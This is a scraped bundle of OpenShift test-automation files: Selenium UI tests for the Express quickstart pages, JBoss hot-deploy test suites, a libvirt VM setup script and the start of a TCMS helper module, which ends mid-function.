"#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossas_java7 import JBossJava7Test\n\nclass EWSJava7Test(JBossJava7Test):\n\n def __init__(self, config):\n JBossJava7Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossews\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.summary = \"[US2513] Java 7 with non-scaling JbossEWS application\"\n \n# def deploy_version_checking_app(self):\n# os.mkdir(self.config.git_repo + \"/webapps/testing/\")\n# # Editing file\n# jsp_file = open(self.config.git_repo + \"/webapps/testing/version.jsp\", \"w\")\n# jsp_file.write('<%@ page contentType=\"text/plain\" %>\\n')\n# jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>\\n')\n# jsp_file.write('<% out.println(\"Java version: \" + System.getProperty(\"java.version\")); %>\\n')\n# jsp_file.close()\n# # Deploying\n# deployment_steps = [\n# \"cd %s\" % self.config.git_repo,\n# \"git add .\",\n# \"git commit -a -m testing\",\n# \"git push\"\n# ]\n# common.command_get_status(\" && \".join(deployment_steps))\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSJava7Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.6721928715705872, "alphanum_fraction": 0.6788623929023743, "avg_line_length": 76.45756530761719, "blob_id": "e422d38109c7c118821a20ee50828d355b83d659", "content_id": "58eca8441865b6fdadf867050771323b142d614d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20991, "license_type": "no_license", "max_line_length": 294, "num_lines": 271, "path": "/automation/open/testmodules/UI/web/tc_express.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass Express(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_check_express_about(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n baseutils.assert_text_equal_by_xpath(self,\"Looking for a fast on-ramp to the Cloud? Get Java, Ruby, PHP, Perl and Python apps in the cloud with the command-line and Git in just a few mintes.\",\"//*[@id='about']/p[1]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install\",\"//*[@id='about']/h2[1]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download and install the OpenShift Express client tools so you can deploy and manage your application in the cloud.\",\"//section[@id='about']/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Create\",\"//*[@id='about']/h2[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Create a subdomain for your application and clone the Git master repository from the cloud.\",\"//section[@id='about']/p[3]\") \n baseutils.assert_text_equal_by_xpath(self,\"Deploy\",\"//*[@id='about']/h2[3]\")\n baseutils.assert_text_equal_by_xpath(self,\"Add your application code to the Git repository and push to the cloud. Congratulations, your application is live!\",\"//section[@id='about']/p[4]\")\n\n def test_check_express_videos(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.click_element_by_link_text(self,\"Videos\")\n baseutils.assert_text_equal_by_css(self,\"EXPRESS VIDEOS\",\"#videos > header > h1\")\n baseutils.assert_text_equal_by_xpath(self,\"OpenShift Express Product Tour\",\"//*[@id='videos']/div[1]/header/h2\")\n baseutils.assert_text_equal_by_css(self,\"Mike McGrath, Cloud Architect - Red Hat\",\"p.video-author.author\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div/div/a/img\")\n baseutils.assert_text_equal_by_css(self,\"This video walks you through the high level functionality of OpenShift Express, from installing the client tools, creating a subdomain to deploying your app onto the cloud.\",\"p.video-description\")\n baseutils.assert_text_equal_by_xpath(self,\"Mobile App Deployment to Express w/ Appcelerator\",\"//section[@id='videos']/div[2]/header/h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Nolan Wright, CTO and Co-Founder - Appcelerator\",\"//section[@id='videos']/div[2]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div[2]/div/a/img\")\n baseutils.assert_text_equal_by_xpath(self,\"This video shows you just how easy it is to develop and deploy a mobile app onto OpenShift Express with Appcelerator's Mobile Cloud Platform\",\"//section[@id='videos']/div[2]/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Deploying to OpenShift PaaS with the eXo Cloud IDE\",\"//section[@id='videos']/div[3]/header/h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Mark Downey, Developer Advocate\",\"//section[@id='videos']/div[3]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div[3]/div/a/img\")\n baseutils.assert_text_equal_by_xpath(self,\"This video demonstrates how easy it is to use the eXo cloud IDE to develop and deploy applications on OpenShift.\",\"//section[@id='videos']/div[3]/p[2]\")\n baseutils.click_element_by_link_text(self,\"Watch more videos\")\n baseutils.check_title(self,\"Videos | Red Hat OpenShift Community\")\n\n\n \n def test_check_express_navi(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='account']/ul/li/a\")\n baseutils.assert_text_equal_by_css(self,\"Sign up for OpenShift - it's Easy!\",\"#signup > header > h1\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_link_text(self,\"Documentation\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift Express\",\"span.productname\")\n baseutils.check_title(self,\"User Guide\")\n baseutils.go_back(self)\n baseutils.click_element_by_link_text(self,\"Forum\")\n baseutils.check_title(self,\"Express | Red Hat OpenShift Community\")\n \n\n def test_a_check_express_quick_start_links(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n #baseutils.click_element_by_css(self,\"#toc > li > a\")\n #baseutils.assert_text_equal_by_xpath(self,\"Install the client tools\",\"//h3\")\n time.sleep(3)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='toc']/li[3]/a\")\n baseutils.scroll_by(self)\n baseutils.assert_text_equal_by_xpath(self,\"Create your first application\",\"//li[@id='create_application']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Make a change, publish\")\n baseutils.scroll_by(self)\n baseutils.assert_text_equal_by_xpath(self,\"Make a change, publish\",\"//li[@id='publish']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Next steps\")\n baseutils.assert_text_equal_by_css(self,\"Next steps\",\"#next_steps > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Red Hat Enterprise Linux or Fedora\")\n baseutils.assert_text_equal_by_xpath(self,\"Red Hat Enterprise Linux or Fedora\",\"//li[@id='rhel']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Other Linux Systems\")\n baseutils.assert_text_equal_by_css(self,\"Other Linuxes\",\"#other_nix > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Mac OS X\")\n baseutils.assert_text_equal_by_css(self,\"Mac\",\"#mac > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Windows\")\n baseutils.assert_text_equal_by_css(self,\"Windows\",\"#win > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n if config.proxy :\n baseutils.click_element_by_link_text(self,\"openshift.repo\")\n baseutils.go_back(self)\n #baseutils.go_to_express_quick_start(self)\n time.sleep(5)\n else :\n baseutils.assert_element_present_by_link_text(self,\"openshift.repo\")\n \n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='rhel']/aside/p[1]/a\")\n baseutils.check_title(self,\"Sudo Main Page\")\n baseutils.go_back(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Installing OpenShift client tools video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Install the OpenShift Express Client Tools - YouTube\")\n baseutils.go_back(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Full Xcode Suite -- or --\")\n baseutils.check_title(self,\"Download Xcode 4 - Apple Developer\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_link_text(self,\"git for OS X\")\n baseutils.check_title(self,\"git-osx-installer - OSX Installer for Git - Google Project Hosting\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_link_text(self,\"Cygwin\")\n baseutils.check_title(self,\"Cygwin\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n time.sleep(5)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_xpath(self,\"//div[@id='domain_link']/a\")\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n if config.proxy :\n baseutils.click_element_by_link_text(self,\"Creating a application video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Create and Define your Application - YouTube\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_link_text(self,\"Deploying an application video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Deploy to the Cloud - YouTube\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n else :\n baseutils.assert_element_present_by_link_text(self,\"Creating a application video walkthrough\")\n baseutils.assert_element_present_by_link_text(self,\"Deploying an application video walkthrough\")\n \n \n def test_aa_check_express_quick_start_links_a(self):\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n baseutils.click_element_by_link_text(self,\"TurboGears2 Python framework\")\n baseutils.assert_text_equal_by_xpath(self,\"Deploying TurboGears2 Python web framework using Express\",\"//section/div[2]/h2\")\n# baseutils.check_title(self,\"Deploying TurboGears2 Python web framework using Express | Red Hat Openshift Community\")\n# baseutils.go_back(self)\n# self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.go_to_express(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n baseutils.click_element_by_link_text(self,\"Pyramid Python framework\")\n baseutils.assert_element_present_by_link_text(self,\"http://pylonsproject.org/projects/pyramid/about\")\n# baseutils.assert_text_equal_by_xpath(self,\"OpenShift > Community > Blogs > Deploying a Pyramid application in a virtual Python WSGI environment on Red Hat OpenShift Express\",\"//section[@id='about']/div\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(@href, 'https://www.redhat.com/openshift/sites/default/files/documents/RHOS_Express_Getting_Started_w_Drupal.pdf')]\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(@href, 'https://www.redhat.com/openshift/sites/default/files/documents/RHOS_Express_Getting_Started_w_MediaWiki.pdf')]\")\n baseutils.click_element_by_xpath(self,\"//li[@id='next_steps']/ul/li/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Videos\",\"//section[@id='about']/div[2]/div[2]/h2\")\n# baseutils.check_title(self,\"Videos | Red Hat Openshift Community\")\n baseutils.go_to_express(self)\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n# self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.click_element_by_link_text(self,\"Technical Documentation\")\n baseutils.assert_text_equal_by_xpath(self,\"User Guide\",\"//div[@id='id3774062']/div/div/div[2]/h1\")\n# baseutils.check_title(self,\"User Guide\")\n baseutils.go_back(self)\n baseutils.click_element_by_link_text(self,\"Support Forums\")\n baseutils.assert_text_equal_by_xpath(self,\"FORUM\",\"//section[@id='about']/div[2]/div/table/thead/tr/th\")\n# baseutils.check_title(self,\"Forums | Red Hat Openshift Community\")\n baseutils.go_back(self)\n\n\n \n def test_check_express_quick_start_contents(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the client tools\",\"//*[@id='install_client_tools']/h3\")\n baseutils.assert_text_equal_by_xpath(self,\"Red Hat Enterprise Linux or Fedora\",\"//li[@id='rhel']/h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"h5\")\n baseutils.assert_text_equal_by_xpath(self,\"RHEL 6 and up or Fedora 14 and up.\",\"//li[@id='rhel']/ol/li/ul/li\")\n baseutils.assert_text_equal_by_xpath(self,\"Root or sudoer access\",\"//li[@id='rhel']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download the express repo file openshift.repo\",\"//li[@id='rhel']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,'Move the openshift.repo file to your /etc/yum.repos.d/ directory.\\n$ sudo mv ~/Downloads/openshift.repo /etc/yum.repos.d/\\nReplace \\'~/Downloads/openshift.repo\\' with the location to which you saved the repo file.',\"//li[@id='rhel']/ol/li[3]\")\n baseutils.assert_text_equal_by_xpath(self,\"$ sudo mv ~/Downloads/openshift.repo /etc/yum.repos.d/\",\"//li[@id='rhel']/ol/li[3]/pre\")\n baseutils.assert_text_equal_by_xpath(self,'Install the client tools:\\n$ sudo yum install rhc',\"//li[@id='rhel']/ol/li[4]\")\n baseutils.assert_text_equal_by_css(self,\"The sudo command will only work if your user is listed in the sudoers file. For more information on setting up sudo, see http://www.gratisoft.us/sudo/sudo.html.\",\"aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"As an alternative to sudo, you can activate a root terminal with the su command and the root password. In that case, omit sudo from the given commands. Don't forget to close your root terminal when you're done!\",\"//li[@id='rhel']/aside/p[2]\")\n baseutils.assert_text_equal_by_css(self,\"Other Linuxes\",\"#other_nix > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#other_nix > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_css(self,\"Root access\",\"#other_nix > ol > li.prereqs > ul > li\")\n baseutils.assert_text_equal_by_xpath(self,\"Ruby 1.8 or higher installed or available to be installed\",\"//li[@id='other_nix']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the required packages: git, ruby, rubygems, and the ruby 1.8 development package.\",\"//li[@id='other_nix']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the gem:\\n$ su -c \\'gem install rhc\\'\",\"//li[@id='other_nix']/ol/li[3]\")\n baseutils.assert_text_equal_by_css(self,\"Mac\",\"#mac > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#mac > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_xpath(self,\"Full Xcode Suite -- or --\",\"//li[3]/ol/li/ul/li/ol/li/a\")\n baseutils.assert_text_equal_by_xpath(self,\"git for OS X\",\"//li[3]/ol/li/ul/li/ol/li[2]/a\")\n baseutils.assert_text_equal_by_css(self,\"Windows\",\"#win > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#win > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_xpath(self,'The following optional cygwin components\\nopenssh\\nruby\\nmake\\ngcc\\ngit',\"//li[@id='win']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download and extract rubygems from http://rubyforge.org/projects/rubygems\",\"//li[@id='win']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,'From within cygwin run:\\n$ ruby <path_to_extracted_rubygems>/setup.rb install',\"//li[@id='win']/ol/li[3]\")\n baseutils.assert_text_equal_by_xpath(self,'Install the gem:\\n$ gem install rhc',\"//li[@id='win']/ol/li[4]\")\n baseutils.assert_text_equal_by_css(self,\"Create a domain name\",\"#create_domain_name > h4\")\n baseutils.assert_text_equal_by_css(self,\"Using your OpenShift login and password, call rhc-create-domain to create a unique domain name for your applications.\",\"div.main > p\")\n \n def test_check_express_quick_start_contents_b(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_css(self,'$ rhc-create-domain -n mydomain -l rhlogin\\nPassword: (type... type... type...)',\"div.main > pre\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift domain names make up part of your app's url. They are also unique across all OpenShift users, so choose wisely, and be creative!\",\"div.main > aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"The rhc-create-domain command will create a configuration file - <your home directory>/.openshift/express.conf - which sets up a default login.\",\"//li[@id='create_domain_name']/div/aside[2]/p\")\n baseutils.assert_text_equal_by_css(self,\"Why wait?\",\"#domain_link > h4\")\n baseutils.assert_text_equal_by_css(self, \"Reserve your amazing domain name right now!\",\"#domain_link > h5\")\n baseutils.assert_text_equal_by_css(self,\"All you need is an ssh keypair and a unique name.\",\"#domain_link > p\")\n baseutils.assert_text_equal_by_css(self,\"Create your first application\",\"#create_application > h4\")\n baseutils.assert_text_equal_by_css(self,\"Now you can create an application.\",\"#create_application > p\")\n baseutils.assert_text_equal_by_css(self,'$ rhc-create-app -a myapp -t php-5.3\\nPassword: (type... type... type...)',\"#create_application > pre\")\n # baseutils.assert_text_equal_by_xpath(self,\"This will create a remote git repository for your application, and clone it locally in your current directory.\",\"//li[@id='create_application']/p[2]\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift offers many application stacks. Run rhc-create-app -h to see all of your options.\",\"#create_application > aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"Your application's domain name will be <your app name>-<your domain name>.rhcloud.com. So, the application created by the example commands would be located at myapp-mydomain.rhcloud.com\",\"//li[@id='create_application']/aside[2]/p\")\n baseutils.assert_text_equal_by_css(self,\"Make a change, publish\",\"#publish > h4\")\n baseutils.assert_text_equal_by_css(self,\"As we all know, getting an application running is only the first step. Now you are on the road to making it your own. Here's an example for the php framework.\",\"#publish > p\")\n # baseutils.assert_text_equal_by_xpath(self,\"Now, check your URL - your change will be live.\",\"//li[@id='publish']/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Use whichever ide or editor works best for you. Chances are, it'll have git support. Even if it doesn't, you're just two simple commands away from glory!\",\"//li[@id='publish']/aside[2]/p\")\n baseutils.assert_text_equal_by_xpath(self,\"Checkout these great guides for deploying popular frameworks on OpenShift:\",\"//li[@id='publish']/aside[3]/p\")\n baseutils.assert_text_equal_by_css(self,\"Next steps\",\"#next_steps > h4\")\n baseutils.assert_text_equal_by_css(self,\"While this has gotten you started, there is a lot more information out there to really get you going. Check out the following pages for videos, blogs, and tutorials:\",\"#next_steps > p\")\n baseutils.assert_text_equal_by_css(self,'$ cd myapp\\n$ vim php/index.php\\n(Make a change... :wq)\\n$ git commit -a -m \\\"My first change\\\"\\n$ git push',\"#publish > pre\")\n \n \n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6382636427879333, "alphanum_fraction": 0.6655948758125305, "avg_line_length": 21.600000381469727, "blob_id": "174b1f48a9712029aa4dce93c0f67c5ddafe9010", "content_id": "b61b91103c1c03c1ae87c9e39881ecff6eb591e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 113, "num_lines": 55, "path": "/automation/open/testmodules/UI/web/case_166505.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_166505.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass LoginWithSimpleAccount(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login_new(web.username_simple_account,web.password_simple_account)\n web.go_to_account_page()\n web.assert_text_equal_by_xpath(web.username_simple_account,\"//div[@id='new_web_user']/table/tbody/tr/td\")\n web.assert_text_equal_by_xpath(\"OpenShift\",\"//div[@id='new_web_user']/table/tbody/tr/td[2]\")\n\n\n self.tearDown()\n\n return self.passed(\" case_166505--LoginWithSimpleAccount passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginWithSimpleAccount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_166505.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7008797526359558, "alphanum_fraction": 0.7155424952507019, "avg_line_length": 23.35714340209961, "blob_id": "9947ee793fa5868586106c695ad16622fb7fe770", "content_id": "2ea67468de34194ab450e1800e4541ebf7e894e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbosseap_with_jenkins import EAPHotDeployWithJenkins\n\nclass EAPScalingHotDeployWithJenkins(EAPHotDeployWithJenkins):\n def __init__(self, config):\n EAPHotDeployWithJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scalable application - with Jenkins - jboss-eap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7118402123451233, "alphanum_fraction": 0.7246790528297424, "avg_line_length": 24.035715103149414, "blob_id": "a134e1ab82cf781fef3404b3ca8a90ea70fe1327", "content_id": "46aa66df051c2f881b5c45eb6815eae71ad9edc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossews_without_jenkins import EWSHotDeployWithoutJenkins\n\nclass EWSScalingHotDeployWithoutJenkins(EWSHotDeployWithoutJenkins):\n def __init__(self, config):\n EWSHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2513] Hot deployment support for scalable application - without Jenkins - jbossEWS\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6482787132263184, "alphanum_fraction": 0.6777271032333374, "avg_line_length": 26.363636016845703, "blob_id": "84cd816294808aa4d062dd4570ba8ad89ca9bc48", "content_id": "d4854be841a42f6b9800235d687d65f3a6dac666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2411, "license_type": "no_license", "max_line_length": 124, "num_lines": 88, "path": "/open_automation/bin/setup_onpremise_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource setup_onpremise_env.rc\n\nexport FEDORA_VERSION=16\nexport DEBIAN_VERSION=wheezy\nexport UBUNTU_VERSION=quantal\nexport RHEL_VERSION=6.3\nexport CENTOS_VERSION=6.3\n#host with kickstarts files and auto setup configuration\n#export KICKSTART_HOST=\"http://file.rdu.redhat.com/~mmasters/\"\nexport KICKSTART_HOST=\"https://github.com/openshift/enterprise/blob/enterprise-1.0/\"\nexport KICKSTART_HOST=\"http://file.brq.redhat.com/~mzimen/\"\nexport KICKSTART=\"${KICKSTART_HOST}/openshift.ks\"\nexport DISK_SIZE=\"8\" #size in GB\nexport RAM_SIZE=1024\n\necho \"Using RHEL $RHEL_VERSION now...\"\ncreate_guest_rhel\n\nexit 0\n\nset -e\nif ! $(rpm -q nmap 2>&1 >/dev/null); then\n echo \"please install nmap\"\n exit 1\nfi\ncurrent_dir=$(pwd)\necho \"Current Dir: $(pwd)\" \n# realpath is available on F16, not on rhel6.2\n#script_real_path=$(realpath $0)\n# start_with shell tips\n#if [[ \"$0\" = /* ]]; then\n# root_dir=$(dirname $script_dir)\nscript_dir=$(dirname $0)\npushd $script_dir && script_real_dir=$(pwd) && popd\nroot_dir=$(dirname $script_real_dir)\n# For jenkins integration source using\nif [ ! -f ${root_dir}/etc/onpremise/vm-template.xml ]; then\n root_dir=$(pwd)\nfi\n\nimg_path=\"http://fileshare.englab.nay.redhat.com/pub/libra/OnPremise/CleanImage/RHEL_6.3_x86_64.qcow2\"\nvm_img_dir=\"/var/lib/libvirt/images\"\nvm_template_xml=\"${root_dir}/etc/onpremise/vm-template.xml\"\nparent_vm_name=\"parent_node\"\nparent_vm_img=\"${vm_img_dir}/${parent_vm_name}.qcow2\"\n\nvm_username=\"root\"\nvm_password=\"redhat\"\nssh_key_file=\"${HOME}/.ssh/mykey\"\nboot_timeout=\"90\"\n\ntarget_repo_file=\"/etc/yum.repos.d/openshift_devops.repo\"\n\ndomain_name=\"devops.example.com\"\nbroker_name=\"broker\"\n\n\n\n\n\n########### CONFIGURATION ####################\n#\n# [BROKER]\n# |\n# +----[NODE0]\n# |\n# +----[NODE1]\n#\n###############################################\n\n\n# 1. Create BROKER from scratch if doesn't exist (use kickstart)\n# 2. Create 2 NODES from scratch if they don't exist (use kickstart)\n# 3. Do the testing\n\n\n\n\n# MAIN\n#prepare_parent_img \"http://download.lab.bos.redhat.com/rel-eng/OpenShift/Alpha/latest/DevOps/x86_64/os/\"\n#prepare_parent_img \"http://buildvm-devops.usersys.redhat.com/puddle/build/OpenShift/Alpha/2012-08-28.3/DevOps/x86_64/os/\" 1\n#create_broker \"${parent_vm_img}\" \"${broker_name}\" 1\n#add_node \"${parent_vm_img}\" \"node0\" \"${broker_ip}\" 1\n\n#broker_ip=\"10.66.9.141\"\n#add_node \"${parent_vm_img}\" \"node1\" \"$broker_ip\" 1\n\n\n\n" }, { "alpha_fraction": 0.5507246255874634, "alphanum_fraction": 0.5575490593910217, "avg_line_length": 36.69709396362305, "blob_id": "ebcb9fa432a0d8767ad0af902650e2ca4142ca22", "content_id": "132e689b2ed4d994b7254f9cb6a42eaf092a5d67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27255, "license_type": "no_license", "max_line_length": 134, "num_lines": 723, "path": "/automation/open/lib/tcms_base.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\ntest TCMS python module\n\n\"\"\"\nimport os\nimport sys\nimport datetime as dt\nfrom nitrate import NitrateKerbXmlrpc\nfrom datetime import timedelta\nimport datetime\nimport time\nimport json\nfrom StringIO import StringIO\nimport database\n\n#PROD = 'OpenShift Flex'\nIDLE = 1\nPASSED = 2\nFAILED = 3\n\nRUNNING = 0\nFINISHED = 1\n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, \n 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n\nclass RunStatus(object):\n IDLE, PASSED, FAILED, RUNNING, PAUSED, BLOCKED, ERROR, WAIVED = range(1,\n 9)\n\ndef run_kinit():\n tcms_user = os.getenv('TCMS_USER')\n tcms_passwd = 